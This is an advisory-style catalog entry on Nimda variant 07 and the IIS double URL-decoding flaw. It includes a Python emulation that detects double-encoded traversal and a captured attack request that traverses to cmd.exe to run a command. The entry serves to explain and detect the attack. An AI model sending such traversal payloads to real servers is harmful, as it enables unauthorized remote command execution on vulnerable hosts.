Nimda, variant 07


IIS on Windows


CVE: CAN-2001-0333
CERT-Advisory: CA-2001-26
CERT-Vuln: 111677
Microsoft: MS01-020
Bugtraq: 2708


URL decoding error


Remote access


Captured with snort


A URI (RFC 2396) has a limited set of allowed characters. Since this set is smaller than the set of characters allowed in filenames, the standard allows special characters to be encoded as % followed by the hex value of the character.

The flaw was that IIS decoded some of the input twice. IIS checks the path for security after the first decoding, but it is the second decoding that determines which file is actually accessed.
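As an added illustration (not part of the original write-up), the following Python emulates the two decoding passes on the request line captured below and shows why a path check performed after the first pass never sees the traversal; the function names are mine.

```python
import re

# Request line as captured on this page (Nimda variant 07).
NIMDA_V07_REQUEST_LINE = "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"

_PCT_ESCAPE = re.compile(r"%([0-9A-Fa-f]{2})")

def decode_once(path: str) -> str:
    """One pass of RFC 2396 percent-decoding; malformed escapes stay as-is.
    '%%35c' -> '%5c' because only the '%35' part is a valid escape."""
    return _PCT_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), path)

def canonicalize(path: str):
    """Resolve '.', '..' and both slash styles against a virtual root.
    Returns the normalized path, or None if '..' climbs above the root."""
    parts = []
    for seg in path.replace("\\", "/").split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if not parts:
                return None
            parts.pop()
        else:
            parts.append(seg)
    return "/" + "/".join(parts)

def request_path(request_line: str) -> str:
    """Pull the path (without the query string) out of an HTTP request line."""
    _method, target, _version = request_line.split(" ", 2)
    return target.split("?", 1)[0]

def inspect_path(raw_path: str) -> dict:
    """Emulate the two decoding passes and report what each one yields.
    'double_encoded' means a second pass still changed the path, and
    'escapes_root_after_second_pass' is the traversal that a check
    done after the first pass never saw."""
    once = decode_once(raw_path)
    twice = decode_once(once)
    return {
        "after_first_pass": once,
        "after_second_pass": twice,
        "first_pass_canonical": canonicalize(once),
        "double_encoded": once != twice,
        "escapes_root_after_second_pass": canonicalize(twice) is None,
    }

if __name__ == "__main__":
    for key, value in inspect_path(request_path(NIMDA_V07_REQUEST_LINE)).items():
        print(f"{key}: {value}")
```

Flagging any request whose second pass still changes the path is a cheap detection for double encoding, independent of which traversal string a given variant uses.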

NSFocus has a good description of the flaw. CERT claims they found the flaw.

Nimda had several other transmission methods not involving web servers.

Nimda used at least 18 variants.

Attack string

GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www
Connnection: close

Attack program source

None available.